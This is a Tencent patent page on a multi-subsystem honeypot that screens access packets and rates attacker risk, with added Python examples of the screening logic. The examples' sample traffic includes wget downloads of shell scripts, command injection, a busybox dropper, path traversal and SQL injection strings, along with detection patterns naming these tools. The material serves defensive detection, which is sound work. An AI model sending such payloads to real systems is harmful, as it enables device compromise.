CN114765553B - Security management method, device, computer equipment and storage medium for access data - Google Patents


Info

Publication number: CN114765553B
Application number: CN202110032177.XA
Authority: CN (China)
Prior art keywords: attack, induction, data packet, subsystem, access
Legal status: Active
Other languages: Chinese (zh)
Other versions: CN114765553A (en)
Inventors: 李伟, 赵天星, 韩景维, 张洪睿, 张瑜龙
Current assignee: Tencent Technology Shenzhen Co Ltd
Original assignee: Tencent Technology Shenzhen Co Ltd

Events
Application filed by Tencent Technology Shenzhen Co Ltd
Priority to CN202110032177.XA
Publication of CN114765553A
Application granted
Publication of CN114765553B
Legal status: Active
Anticipated expiration

Classifications

    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00 Network architectures or network communication protocols for network security
    • H04L63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441 Countermeasures against malicious traffic
    • H04L63/1491 Countermeasures against malicious traffic using deception as countermeasure, e.g. honeypots, honeynets, decoys or entrapment
    • H04L63/1408 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L63/1416 Event detection, e.g. attack signature detection
    • H04L63/1425 Traffic logging, e.g. anomaly detection
    • H04L63/1433 Vulnerability analysis

Abstract

Embodiments of this application relate to the field of cloud technology and provide a security management method, apparatus, computer device and storage medium for access data that can identify and handle attack behaviour by visitors. In particular: access data packets received by at least one induction server in an attack induction (decoy, honeypot-based) system are obtained, where the attack induction system comprises at least two attack induction subsystems; a screening order and a screening rule are determined for each attack induction subsystem according to its attack induction capability; attack data packets are identified among each subsystem's access data packets based on that screening order and rule; and each attack data packet is processed according to the attack risk it poses to the attack induction system. Because different attack induction subsystems attract a wider range of attack behaviour, combining several of them forms an attack induction system with strong capture capability, which widens the range and improves the accuracy of attack data recognition.

Description

Security management method, device, computer equipment and storage medium for access data
Technical Field
Embodiments of this application relate to the field of cloud technology, and in particular to a security management method, apparatus, computer device and storage medium for access data.
Background
In the related art, honeypots can be deployed in a network to trap attacks aimed at that network. In some fields, however, the client devices involved are numerous and of many types. In the Internet of Things, for example, the sheer number of connected objects means there are many kinds of client device, in large numbers, that an attacker can target.
For the security of systems with many client devices of many types, a solution is therefore needed that can analyse and handle the multiple kinds of attack such systems face, so as to improve their security.
Disclosure of Invention
Embodiments of this application provide a security management method, apparatus, computer device and storage medium for access data that can effectively detect the various attacks that may occur in a system with many client devices of many types, and thereby help improve the security of that system.
To solve the above technical problem, an embodiment of this application provides a security management method for access data, comprising:
obtaining access data packets received by at least one induction server in an attack induction system, where the attack induction system comprises at least two attack induction subsystems and each attack induction subsystem comprises an induction server and at least one induction client device connected to that induction server;
determining, according to the attack induction capability of each attack induction subsystem, the screening order and the screening rule for the attack data packets of that subsystem;
determining the attack induction subsystem currently to be screened based on the screening order of the attack induction subsystems;
if the currently screened attack induction subsystem is first in the screening order, determining the attack data packets among its access data packets based on the screening rule corresponding to that subsystem and the access data packets it received;
if the currently screened attack induction subsystem is not first in the screening order, obtaining the sending users of the attack data packets already identified from the screening results of the subsystems screened before it, determining the access data packets sent by those users among the access data packets received by the currently screened subsystem to be attack data packets, and determining attack data packets among the remaining (not yet selected) access data packets based on the screening rule corresponding to the currently screened subsystem and those remaining access data packets;
and processing each attack data packet based on the attack risk it is determined to pose to the attack induction system.
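The screening order and sender propagation described in the steps above, as an added worked example (not code from the patent or from its assignee): three hypothetical subsystems are screened from the most to the least capable; packets from a sender already identified by an earlier subsystem are flagged without further screening, and the rest are passed through the current subsystem's own rule. The packet fields, the numeric capability score, the protocol-plus-keyword rule and the sample traffic are all assumptions.

```python
"""Ordered screening of access packets across several attack induction subsystems.

Added example, not code from the patent: the cascade (screen the first subsystem
with its own rule; for every later subsystem, flag packets from senders already
identified, then apply that subsystem's rule to the rest) follows the method
steps; packet fields, the numeric capability score, the rule format and the
sample traffic are assumptions.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    subsystem: str   # attack induction subsystem whose induction server received it
    sender: str      # sending user, here identified by source IP (assumption)
    protocol: str
    payload: str


@dataclass(frozen=True)
class Subsystem:
    name: str
    capability: int        # attack induction capability; higher = screened earlier (assumption)
    protocols: frozenset   # protocols preset in this subsystem's screening rule
    keywords: tuple        # attack keywords preset in this subsystem's screening rule


def screening_order(subsystems):
    """Derive the screening order from induction capability, most capable first."""
    return sorted(subsystems, key=lambda s: s.capability, reverse=True)


def rule_match(sub, pkt):
    """Simplified per-subsystem screening rule: preset protocol plus an attack keyword."""
    return pkt.protocol in sub.protocols and any(
        k in pkt.payload.lower() for k in sub.keywords)


def screen(subsystems, packets):
    """Return ([(packet, reason), ...], flagged_senders) for the whole induction system.

    reason is "known_sender" when the packet is flagged only because its sender was
    identified by an earlier subsystem, otherwise "rule".
    """
    flagged_senders = set()
    attacks = []
    for sub in screening_order(subsystems):
        received = [p for p in packets if p.subsystem == sub.name]
        # Packets from senders already identified by earlier subsystems are attack
        # packets without further screening (the set is empty for the first subsystem).
        unselected = []
        for p in received:
            if p.sender in flagged_senders:
                attacks.append((p, "known_sender"))
            else:
                unselected.append(p)
        # The remaining packets are screened with this subsystem's own rule.
        for p in unselected:
            if rule_match(sub, p):
                attacks.append((p, "rule"))
                flagged_senders.add(p.sender)
    return attacks, flagged_senders


# Constructed sample: three subsystems and six access packets (not real traffic).
SUBSYSTEMS = [
    Subsystem("web_sim", 1, frozenset({"http"}), ("union select", "<script")),
    Subsystem("iot_sim", 3, frozenset({"mqtt", "coap", "telnet"}), ("wget http", "/bin/busybox")),
    Subsystem("intranet_mapped", 2, frozenset({"telnet", "ssh", "http"}), ("busybox", "enable\nsystem")),
]

SAMPLE_PACKETS = [
    Packet("iot_sim", "198.51.100.7", "mqtt", "PUBLISH cmd wget http://198.51.100.7/bot.sh"),
    Packet("iot_sim", "203.0.113.5", "http", "GET /index.html"),
    Packet("intranet_mapped", "198.51.100.7", "http", "GET /status"),
    Packet("intranet_mapped", "203.0.113.9", "telnet", "root\n/bin/busybox wget"),
    Packet("web_sim", "203.0.113.5", "http", "GET /?id=1 union select 1,2,3"),
    Packet("web_sim", "192.0.2.44", "http", "GET /robots.txt"),
]

if __name__ == "__main__":
    found, senders = screen(SUBSYSTEMS, SAMPLE_PACKETS)
    for pkt, reason in found:
        print(f"{pkt.subsystem:16} {pkt.sender:14} {reason}")
    print("flagged senders:", sorted(senders))
```

With the sample data, the intranet_mapped packet "GET /status" from 198.51.100.7 is flagged only because the iot_sim subsystem identified that sender first; screened in isolation it would pass, which is why the order is derived from induction capability rather than chosen arbitrarily.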
To solve the above technical problem, an embodiment of this application further provides a security management apparatus for access data, the apparatus comprising:
a data packet acquisition unit, configured to obtain access data packets received by at least one induction server in an attack induction system, where the attack induction system comprises at least two attack induction subsystems and each attack induction subsystem comprises an induction server and at least one induction client device connected to that induction server;
a screening scheme determining unit, configured to determine, according to the attack induction capability of each attack induction subsystem, the screening order and the screening rule for the attack data packets of that subsystem;
a screening object determining unit, configured to determine the attack induction subsystem currently to be screened based on the screening order of the attack induction subsystems;
a first screening unit, configured to, if the currently screened attack induction subsystem is first in the screening order, determine the attack data packets among its access data packets based on the screening rule corresponding to that subsystem and the access data packets it received;
a second screening unit, configured to, if the currently screened attack induction subsystem is not first in the screening order, obtain the sending users of the attack data packets already identified from the screening results of the subsystems screened before it, determine the access data packets sent by those users among the access data packets received by the currently screened subsystem to be attack data packets, and determine attack data packets among the remaining access data packets based on the screening rule corresponding to the currently screened subsystem and those remaining access data packets;
and a processing unit, configured to process each attack data packet based on the attack risk it is determined to pose to the attack induction system.
In an alternative example, the security management apparatus for access data further comprises a deployment unit configured to:
before the data packet acquisition unit obtains the access data packets received by at least one induction server in the attack induction system, obtain a system deployment file for each attack induction subsystem in the attack induction system;
and, based on the deployment mode and system deployment file corresponding to each attack induction subsystem, deploy the server-side induction devices of that subsystem in the public network and its induction client devices in the corresponding client-side network, where the server-side induction devices include the induction server.
In an alternative example, the attack induction subsystems include at least two associated attack induction subsystems that share a first induction server;
and the deployment unit is configured to:
deploy the first induction server in the public network based on the deployment mode and system deployment file of at least one of the associated attack induction subsystems;
deploy, according to the deployment mode and system deployment file of each associated attack induction subsystem, the server-side induction devices of that subsystem other than the first induction server;
and deploy the induction client devices of each associated attack induction subsystem in the corresponding client-side deployment network according to that subsystem's deployment mode and system deployment file.
In an alternative example, the associated attack induction subsystems include a first attack induction subsystem, and the deployment unit is configured to:
simulate, in the public network, the induction client devices to be set up in the first attack induction subsystem, according to its deployment mode and system deployment file;
and simulate, in the public network, a first target protocol required to run the services provided by those induction client devices.
In an alternative example, the associated attack induction subsystems include a second attack induction subsystem, and the deployment unit is configured to:
obtain, according to the deployment mode and system deployment file of the second attack induction subsystem, the intranet access information of physical client devices connected in a target intranet;
and determine those physical client devices to be the induction client devices of the second attack induction subsystem, obtain the public network access information produced by mapping their intranet access information to the public network, and store that public network access information on the first induction server.
In an alternative example, the attack induction subsystems include a third attack induction subsystem, and the deployment unit is configured to:
deploy, in the public network, a server-side induction device based on a target Internet of Things protocol, according to the deployment mode and system deployment file of the third attack induction subsystem;
simulate, in a target intranet, an IoT protocol client device based on that target protocol, to obtain the induction client device of the third attack induction subsystem;
and simulate, in the target intranet, the running of the application programs of that IoT protocol client device, so that the device appears to be in operation.
In an alternative example, the first screening unit is configured to:
obtain, for each access data packet received by the currently screened attack induction subsystem, a corresponding parsed data packet;
obtain the access behaviour characteristic information corresponding to the parsed data packets and, based on it, determine which parsed data packets are suspicious;
and perform feature matching on the suspicious parsed data packets against the attack characteristic information of attack data packets preset in the screening rule corresponding to the currently screened attack induction subsystem, determining the attack data packets among the access data packets from the matching result.
In an alternative example, the first screening unit is configured to:
obtain the protocol used by a parsed data packet from its data;
obtain the access characteristics of the sending user of the parsed data packet from its data;
and determine the parsed data packet to be suspicious if its protocol is one of the protocols preset in the screening rule corresponding to the currently screened attack induction subsystem, and/or its access characteristics match the specific access characteristics of a suspicious user preset in that screening rule.
In an alternative example, the first screening unit is configured to:
perform keyword matching on the suspicious parsed data packets against the attack data packet keywords preset in the screening rule corresponding to the currently screened attack induction subsystem;
determine the suspicious parsed data packets that match to be highly suspicious parsed data packets;
and determine the attack data packets among the access data packets based on the highly suspicious parsed data packets.
In an alternative example, the first screening unit is configured to:
if the payload of a highly suspicious parsed data packet contains the vulnerability features of a vulnerability preset in the screening rule corresponding to the currently screened attack induction subsystem; and/or the content of that packet associated with an Internet of Things protocol shows the attack features against that protocol set out in the screening rule; and/or the data of that packet shows the attack features of a preset attack network technique set out in the screening rule;
determine the access data packet corresponding to that highly suspicious parsed data packet to be an attack data packet.
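The three-stage screening rule of the alternative examples above (protocol or access characteristic, then keyword, then payload feature), as an added worked example that is not the patent's own code. The per-sender "distinct ports touched" access characteristic, the regular expressions (generic patterns, not tied to any specific vulnerability) and the constructed records are assumptions.

```python
"""Staged screening rule for one attack induction subsystem.

Added example, not code from the patent. Stage 1 parses each access packet and
decides from its protocol and the sender's access characteristics whether it is
suspicious; stage 2 keyword-matches suspicious packets to find highly suspicious
ones; stage 3 checks the payload for vulnerability features, IoT protocol attack
features or attack technique features. Record fields, the "distinct ports touched"
access characteristic and every pattern below are assumptions for illustration.
"""
import re
from collections import defaultdict

# Screening rule for a hypothetical IoT-flavoured subsystem (assumed content).
RULE = {
    "protocols": {"mqtt", "coap", "telnet"},           # preset protocols
    "min_distinct_ports": 4,                            # suspicious-user access characteristic
    "keywords": ("wget", "busybox", "$sys/#", "cmd=", "../"),
    "vuln_features": [                                  # generic vulnerability features
        re.compile(r"\.\./\.\./"),                      # path traversal
        re.compile(r"cmd=\s*;\s*(wget|curl)\b"),        # command injection via a cmd parameter
    ],
    "iot_features": [
        re.compile(r"SUBSCRIBE\s+\$SYS/#"),             # wildcard subscribe to broker internals
    ],
    "technique_features": [
        re.compile(r"/bin/busybox\s+\w+"),              # busybox-driven dropper stage
        re.compile(r"union\s+select", re.IGNORECASE),   # SQL injection
    ],
}


def access_features(records):
    """Stage 1 input: per-sender access characteristics derived from the parsed packets."""
    ports = defaultdict(set)
    for r in records:
        ports[r["sender"]].add(r["port"])
    return {sender: {"distinct_ports": len(p)} for sender, p in ports.items()}


def classify(record, features, rule):
    """Return benign | suspicious | high_suspicious | attack for one parsed packet."""
    proto_hit = record["protocol"] in rule["protocols"]
    access_hit = features[record["sender"]]["distinct_ports"] >= rule["min_distinct_ports"]
    if not (proto_hit or access_hit):
        return "benign"                      # stage 1 gate: never inspected further
    payload = record["payload"]
    if not any(k in payload.lower() for k in rule["keywords"]):
        return "suspicious"                  # stage 2: no attack keyword
    for group in ("vuln_features", "iot_features", "technique_features"):
        if any(p.search(payload) for p in rule[group]):
            return "attack"                  # stage 3: an attack feature is present
    return "high_suspicious"


def screen_records(records, rule=RULE):
    """Classify every parsed packet of one subsystem; returns {record id: label}."""
    features = access_features(records)
    return {r["id"]: classify(r, features, rule) for r in records}


# Constructed parsed access packets for one subsystem (not real traffic).
RECORDS = [
    {"id": 1, "sender": "203.0.113.5", "port": 80, "protocol": "http", "payload": "GET /index.html HTTP/1.1"},
    {"id": 2, "sender": "203.0.113.5", "port": 80, "protocol": "http",
     "payload": "GET /cgi-bin/status?cmd=;wget http://203.0.113.5/x.sh HTTP/1.1"},
    {"id": 3, "sender": "198.51.100.7", "port": 1883, "protocol": "mqtt", "payload": "SUBSCRIBE $SYS/#"},
    {"id": 4, "sender": "198.51.100.7", "port": 1883, "protocol": "mqtt", "payload": "SUBSCRIBE sensors/temp"},
    {"id": 5, "sender": "198.51.100.7", "port": 1883, "protocol": "mqtt", "payload": "PUBLISH cmd=reboot"},
    {"id": 6, "sender": "192.0.2.44", "port": 22, "protocol": "ssh", "payload": "SSH-2.0-OpenSSH_8.4"},
    {"id": 7, "sender": "192.0.2.44", "port": 23, "protocol": "telnet", "payload": ""},
    {"id": 8, "sender": "192.0.2.44", "port": 2323, "protocol": "telnet",
     "payload": "enable\nsystem\nshell\nsh\n/bin/busybox wget http://192.0.2.44/b"},
    {"id": 9, "sender": "192.0.2.44", "port": 8080, "protocol": "http", "payload": "GET /../../../../etc/passwd"},
    {"id": 10, "sender": "192.0.2.44", "port": 5555, "protocol": "adb", "payload": "CNXN"},
]

if __name__ == "__main__":
    for pid, label in screen_records(RECORDS).items():
        print(pid, label)
```

Record 2 carries a command injection attempt but is labelled benign: its protocol is not in this subsystem's preset list and its sender touched only one port, so the stage 1 gate never lets it reach the payload checks. That is the practical cost of the staged design, and the reason each subsystem's preset protocols and suspicious-user profile must match the system it imitates (an internet-facing web decoy would list http).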
In an alternative example, the processing unit is configured to:
determine, from the sending user information of the attack data packets, the attack data packets of the same sending user across all attack induction subsystems to be the user-associated attack data packets of that sending user;
determine the attack risk of a sending user's user-associated attack data packets according to their number, the number of attack induction subsystems they attacked, the attack induction capability of those subsystems and the screening rules by which they were identified;
and process the user-associated attack data packets of that sending user in the processing mode corresponding to their attack risk.
In an alternative example, the apparatus further comprises a statistics unit configured to:
obtain, based on the data in the parsed data packets of the attack data packets, statistical information about the attack data packets in at least one abnormal traffic statistical dimension;
and generate an abnormal traffic statistical report based on that statistical information.
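The risk rating and the abnormal traffic report of the two alternative examples above, as an added worked example that is not the patent's own code. The patent names the inputs to the rating (number of a sender's attack packets, number of subsystems hit, their induction capability and the screening rules that fired) but no formula; the weights, formula, thresholds, processing modes and sample attack packets below are assumptions.

```python
"""Risk rating of a sender's attack packets across all subsystems, plus an
abnormal-traffic report.

Added example, not code from the patent. The patent names the inputs to the
risk rating but no formula; the weights, scoring formula, thresholds and
processing modes below are assumptions, as are the sample attack packets.
"""
from collections import Counter, defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class AttackPacket:
    sender: str
    subsystem: str
    protocol: str
    rule: str        # label of the screening rule that identified it (assumption)


CAPABILITY = {"iot_sim": 3, "intranet_mapped": 2, "web_sim": 1}             # assumed induction capability
RULE_WEIGHT = {"known_sender": 1, "protocol_keyword": 2, "vuln_feature": 3}  # assumed rule severity
ACTIONS = {"high": "block sender, alert", "medium": "rate-limit, record", "low": "record"}


def user_associated(packets):
    """Group attack packets of the same sending user across every subsystem."""
    groups = defaultdict(list)
    for p in packets:
        groups[p.sender].append(p)
    return groups


def risk_score(pkts):
    """Assumed formula: packets x strongest rule, plus subsystems hit x their summed capability."""
    subsystems = {p.subsystem for p in pkts}
    strongest_rule = max(RULE_WEIGHT[p.rule] for p in pkts)
    capability = sum(CAPABILITY[s] for s in subsystems)
    return len(pkts) * strongest_rule + len(subsystems) * capability


def risk_level(score):
    """Map the score to a risk band (assumed thresholds)."""
    if score >= 20:
        return "high"
    if score >= 5:
        return "medium"
    return "low"


def assess(packets):
    """Per sender: score, risk level and the processing mode chosen for that level."""
    result = {}
    for sender, pkts in user_associated(packets).items():
        score = risk_score(pkts)
        level = risk_level(score)
        result[sender] = {"score": score, "level": level, "action": ACTIONS[level],
                          "subsystems": sorted({p.subsystem for p in pkts})}
    return result


def traffic_report(packets, dimensions=("protocol", "subsystem", "sender")):
    """Abnormal traffic statistics in each requested dimension."""
    return {d: dict(Counter(getattr(p, d) for p in packets)) for d in dimensions}


# Constructed attack packets already identified by the screening step (not real traffic).
SAMPLE_ATTACKS = [
    AttackPacket("198.51.100.7", "iot_sim", "mqtt", "protocol_keyword"),
    AttackPacket("198.51.100.7", "intranet_mapped", "http", "known_sender"),
    AttackPacket("198.51.100.7", "web_sim", "http", "vuln_feature"),
    AttackPacket("203.0.113.9", "intranet_mapped", "telnet", "protocol_keyword"),
    AttackPacket("203.0.113.5", "web_sim", "http", "protocol_keyword"),
    AttackPacket("203.0.113.5", "web_sim", "http", "protocol_keyword"),
]

if __name__ == "__main__":
    for sender, info in assess(SAMPLE_ATTACKS).items():
        print(sender, info)
    print(traffic_report(SAMPLE_ATTACKS))
```

Sender 198.51.100.7 rates high because it hit all three subsystems, although only one of its packets matched a strong rule; the two web_sim packets from 203.0.113.5 land in the medium band, and the single telnet packet from 203.0.113.9 is merely recorded.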
In an alternative example, the security management apparatus for access data further comprises an information sending unit configured to send the abnormal traffic statistical report to a management terminal when an abnormal traffic checking instruction is received from that terminal after the report has been generated, so that the management terminal can display an abnormal traffic checking page based on the report.
In some embodiments of the present invention, a computer device may also be provided, comprising a memory, a processor and a computer program stored on the memory and executable on the processor, wherein the processor implements the steps of the method as described above when executing the computer program.
In some embodiments of the invention, a storage medium may also be provided, on which a computer program is stored which, when run on a computer, causes the computer to perform the steps of the method as described above.
With the scheme provided by the embodiments of this application, the access data packets received by at least one induction server in the attack induction system can be obtained, where the attack induction system comprises at least two attack induction subsystems and each attack induction subsystem comprises an induction server and at least one induction client device connected to that induction server; a screening order and a screening rule are determined for each attack induction subsystem according to its attack induction capability; the data packets of each attack induction subsystem are screened according to that order and rule to determine the attack data packets; and each attack data packet is processed according to the attack risk it poses to the attack induction system. Because different attack induction subsystems attract more kinds of attack behaviour, the induction servers in the attack induction system receive more attack data packets; and because the attack data packets are detected with the screening scheme specific to each subsystem, the detection results are more accurate, more device vulnerabilities can be found, and the security of industries with many kinds and numbers of client devices is improved.
Drawings
FIG. 1 is a schematic diagram of a network architecture for implementing the present embodiment in accordance with an embodiment of the present application;
FIG. 2a is a flow chart of a security management method for access data according to an embodiment of the present application;
FIG. 2b is a schematic diagram of a configuration of a security management system for access data according to an embodiment of the present application;
FIG. 2c is a schematic diagram of another configuration of a security management system for access data according to an embodiment of the present application;
FIG. 2d is a schematic diagram illustrating the screening of attack data packets according to an embodiment of the present application;
FIG. 3 is a detailed flowchart of a security management method for access data according to an embodiment of the present application;
FIG. 4 is a schematic diagram of a configuration of a security management apparatus for access data according to an embodiment of the present application;
FIG. 5 is a schematic diagram of a computer device according to an embodiment of the present application.
Detailed Description
The terms "first", "second" and the like in the description, claims and drawings of the embodiments of this application are used to distinguish between similar objects and do not necessarily describe a particular sequence or chronological order. It is to be understood that data so designated may be interchanged where appropriate, so that the embodiments described here may be implemented in sequences other than those illustrated or described. Furthermore, the terms "comprises", "comprising" and any variants of them are intended to cover a non-exclusive inclusion: a process, method, system, article or apparatus that comprises a list of steps or modules is not necessarily limited to those explicitly listed, but may include other steps or modules not expressly listed or inherent to such a process, method, article or apparatus. The division into modules in the embodiments of this application is only one logical division; another division may be used in practice, for example several modules may be combined or integrated into another system, or some features may be omitted or not implemented. The coupling, direct coupling or communication connection between modules may be through some interfaces, and an indirect coupling or communication connection between modules may be electrical or of a similar form; none of this is limited in the embodiments of this application. Modules or sub-modules described as separate components may or may not be physically separate, may or may not be physical modules, and may be distributed across several circuit modules; some or all of them may be selected according to actual need to achieve the purposes of the embodiments of this application.
The embodiment of the application provides a security management method, a device, computer equipment and a storage medium for access data.
In this embodiment, the computer device may be a terminal or a server, and the terminal may be a mobile terminal or a fixed terminal. Mobile terminals include, but are not limited to, smart phones, tablet computers, notebook computers, intelligent in-vehicle terminals and the like capable of running an online education course application; fixed terminals include, but are not limited to, desktop computers, smart televisions and the like.
The server may be an independent physical server, a server cluster or distributed system formed by several physical servers, or a cloud server providing cloud services, cloud databases, cloud computing, cloud functions, cloud storage, network services, cloud communication, middleware services, domain name services, security services, CDNs, and basic cloud computing services such as big data and artificial intelligence platforms, but is not limited to these.
Referring to FIG. 1, FIG. 1 illustrates a security management system for access data according to this embodiment. The system may include an attack induction system 10 and a laboratory server 20. The attack induction system 10 includes at least two attack induction subsystems 11, and each attack induction subsystem 11 includes at least one induction client device (not shown in FIG. 1) and an induction server 111 capable of accessing that induction client device; optionally, the induction client devices of different attack induction subsystems may be deployed in different ways.
The laboratory server 20 and each induction server 111 are connected via a network, such as a wireless network.
The induction server 111 of this embodiment may receive access data packets from accessing devices, store them, and transmit the stored access data packets to the laboratory server 20 on receiving a packet acquisition request from the laboratory server 20.
The laboratory server 20 is configured to obtain the access data packets received by at least one induction server in the attack induction system, where the attack induction system comprises at least two attack induction subsystems and each attack induction subsystem comprises an induction server and at least one induction client device connected to that induction server; determine, according to the attack induction capability of each attack induction subsystem, the screening order and the screening rule for the attack data packets of that subsystem; determine the attack induction subsystem currently to be screened based on the screening order of the attack induction subsystems; if the currently screened attack induction subsystem is first in the screening order, determine the attack data packets among its access data packets based on the screening rule corresponding to that subsystem and the access data packets it received; if the currently screened attack induction subsystem is not first in the screening order, obtain the sending users of the attack data packets already identified from the screening results of the subsystems screened before it, determine the access data packets sent by those users among the access data packets received by the currently screened subsystem to be attack data packets, and determine attack data packets among the remaining access data packets based on the screening rule corresponding to the currently screened subsystem and those remaining access data packets; and process each attack data packet based on the attack risk it is determined to pose to the attack induction system.
An embodiment of this application provides a security management method for access data, which may be executed by a processor of a computer device.
Referring to FIG. 2a, the security management method for access data may include:
201. Obtaining access data packets received by at least one induction server in an attack induction system, where the attack induction system comprises at least two attack induction subsystems and each attack induction subsystem comprises an induction server and at least one induction client device connected to that induction server.
In this embodiment, the induction server in an attack induction subsystem has the ability to access the induction client devices in the same attack induction subsystem.
In one example, the deployment mode of different attack induction subsystems, and the deployment of the induction client devices within them, may differ. The deployment mode in this embodiment may cover both the honeypot technology used when the attack induction subsystem is deployed and the way in which the subsystem's induction client devices are set up: different honeypot technologies imply different deployment modes, and physical induction client devices are deployed differently from virtual ones.
The attack induction subsystem in this embodiment is a system that mimics the structure and functional composition of a specific target system; its main function is to attract and capture attack data packets aimed at that target system, so its structure and composition are determined by those of the target system. In one example, the system an attack induction subsystem mimics may be an internet system, an Internet of Things system, and so on.
For example, the attack induction subsystem may be a decoy Internet of Things system built around IoT characteristics, comprising server-side induction devices and induction client devices.
In an attack induction subsystem, the server-side induction devices may include the devices required on the server side of a real IoT system, such as servers and switches.
In an attack induction subsystem, the client devices imitated by the induction client devices may include devices located on the client side of a real IoT system, such as routers, smart televisions, cameras, smart refrigerators, and so on.
Naturally, within the same attack induction subsystem, the server-side induction devices can access the induction client devices.
The attack induction subsystem in this embodiment may be implemented with honeypot technology from the related art: each attack induction subsystem may be regarded as a honeypot built around Internet of Things characteristics, and the attack induction system as a honeypot system formed from several honeypots.
A honeypot is an active-defence network security platform that simulates an enterprise's real network environment, real applications and real business logic to provide a near-real adversarial environment. By exposing apparent vulnerabilities and similar lures it offers attackers a target, draws the attack onto itself in advance, and thereby deceives and delays the attacker while the attack behaviour is identified and collected. Applied to the Internet of Things, this reveals attack behaviour in that field and uncovers vulnerabilities in more, previously unknown, devices, which helps deploy targeted protective measures in the real IoT and improves its defensive security.
In this embodiment, types of honeypots include, but are not limited to, low interaction honeypots, medium interaction honeypots, and high interaction honeypots.
The defining characteristic of the low-interaction honeypot is simulation: every attack weakness and attack object it presents to an attacker is not a real product system but a simulation of various systems and the services they provide. Since its services are all simulated, the information such a honeypot can gather is very limited and it can only respond to an attacker in simple ways, which also makes it the safest type of honeypot.
The medium-interaction honeypot simulates the various behaviours of a real operating system, provides more interactive information, and can obtain more information from the attacker's behaviour. In such a behaviour-simulating system the honeypot may look indistinguishable from a real operating system, making it as tempting an attack target as a real system.
The high-interaction honeypot has a real operating system. Its advantage is that the attacker is given a real operating system, and when the attacker obtains ROOT authority, the attacker is deceived by the realism of the system and its data, so that more of the attacker's activities and behaviours are recorded. Its disadvantage, of course, is that the likelihood of being compromised is high, and if the whole high-interaction honeypot is compromised it becomes a springboard for the attacker's next attack.
In this embodiment, the attack-inducing subsystem may be set based on the above-mentioned honeypot technology, and it may be understood that different attack-inducing subsystems may be set using the same type of honeypot technology, for example, both attack-inducing subsystems are low-interaction honeypots, but deployment modes of the client-side devices induced in the two attack-inducing subsystems are different.
In this embodiment, the induction server may be deployed based on cloud technology, for example on cloud computing, cloud storage, and the like.
Cloud technology is explained first. It is a general term for the network, information, integration, management-platform and application technologies applied in the cloud computing business model; together they form a resource pool that can be used flexibly and on demand. Cloud computing technology will become an important support. Background services of technical network systems, such as video websites, picture websites and portals, require large amounts of computing and storage resources. As the internet industry develops, each item may in future carry its own identifier that must be transmitted to a background system for logical processing; data of different levels are processed separately, and industry data of all kinds require strong back-end support that can only be realised through cloud computing.
Since many hacker attacks continuously send attack data packets, the number of data packets received by the induction server is generally large, and cloud technology is well suited to providing the induction server with computing capacity.
Cloud computing refers to a delivery and usage mode of IT infrastructure in which required resources are obtained over a network in an on-demand, easily scalable manner; in the broad sense, cloud computing refers to the delivery and usage mode of services, meaning that required services are obtained over a network in an on-demand, easily scalable manner. Such services may be IT, software, internet-related, or other services. In this embodiment, the cloud computing service may provide the cloud server resources required to deploy the induction server. Attack induction subsystems implemented with different honeypot technologies may need induction servers of different sizes, for example the required server ports, the protocols to be run and the services provided to clients may differ, so implementing the induction server on a cloud server lets the embodiment use cloud server resources effectively and avoid wasting server resources.
Cloud storage is a new concept which extends and develops in the concept of cloud computing, and a distributed cloud storage system (hereinafter referred to as a storage system for short) refers to a storage system which integrates a large number of storage devices (storage devices are also called storage nodes) of different types in a network through application software or application interfaces to cooperatively work and jointly provides data storage and service access functions for the outside through functions such as cluster application, grid technology, a distributed storage file system and the like. For example, the server stores electronic maps, space units, user data, and the like.
In this embodiment, the access data packet received by the induction server may be stored in a corresponding cloud database based on a cloud storage technology.
The induction server in this embodiment may be a server deployed on a public network, and the deployment network of the induction client device is not limited, and may be deployed on the public network or in some internal networks as required.
In order to facilitate understanding of the solution of the present embodiment, a deployment solution of the attack-inducing system in the present embodiment will be described herein.
In this embodiment, before step 201, the attack induction system may be deployed, and optionally, the scheme for deploying the attack induction system may include:
acquiring a system deployment file of an attack induction subsystem in the attack induction system;
and deploying the server-side induction device of the attack induction subsystem in the public network and the induction client device of the attack induction subsystem in the corresponding client-side deployment network, based on the deployment mode and the system deployment file corresponding to the attack induction subsystem, wherein the server-side induction device includes an induction server.
The system deployment file of each attack induction subsystem may include a system deployment file of a server side and a system deployment file of a client side.
It may be appreciated that the configuration information of the server side induction device may be included in the system deployment file of the server side, for example, a simulation program of the server side induction device, and the like. Of course, in different attack-inducing subsystems, the system deployment files of the server may be different.
In general, the system deployment files of clients are typically different in different attack-inducing subsystems.
In this embodiment, the server side induction device of the attack induction subsystem may be deployed based on the deployment mode and the system deployment file of the server side, and then, based on the system deployment file of the client side, the corresponding induction client device is deployed on the basis that the server side induction device has been deployed.
For example, on the basis that the server side induction device is deployed, based on the protocol and the algorithm port of the induction server, the server port used by each induction client side device in the same attack induction subsystem is determined, and based on the server port, the deployment mode and the system deployment file of the client side, the corresponding induction client side device is deployed.
In one example, a different induction server may be deployed in each attack induction subsystem, and the deployment sequence of the different induction servers is not limited in the deployment process of the attack induction subsystem.
In one example, the deployment process of the attack induction subsystem can be accelerated and resources can be saved by a mode that a plurality of attack induction subsystems share an induction server.
Optionally, in one example, the attack-inducing subsystem includes at least two associated attack-inducing subsystems that share a first induction server; the step of deploying a service end induction device of the attack induction subsystem in the public network and deploying an induction client device of the attack induction subsystem in the corresponding client end network based on a deployment mode and a system deployment file corresponding to the attack induction subsystem may include:
deploying a first induction server in the public network based on the deployment mode of at least one associated attack induction subsystem and the system deployment file;
According to the deployment mode of each associated attack induction subsystem and the system deployment file, deploying other server induction devices except the first induction server in the server induction devices of the associated attack induction subsystems;
and deploying the induction client equipment of each associated attack induction subsystem in the corresponding client end deployment network according to the deployment mode of each associated attack induction subsystem and the system deployment file.
In this embodiment, in the association attack induction subsystem, the system deployment files of the server may be identical, or at least the deployment files of the first induction server may be identical.
In this embodiment, the first induction server may be implemented based on a low-interaction honeypot technology or a medium-interaction honeypot technology, which is not limited in this embodiment.
In one example, the deployment order of the two association attack induction subsystems is not limited, and may be set according to needs, and the server induction devices to be deployed in the two association attack induction subsystems may not be identical.
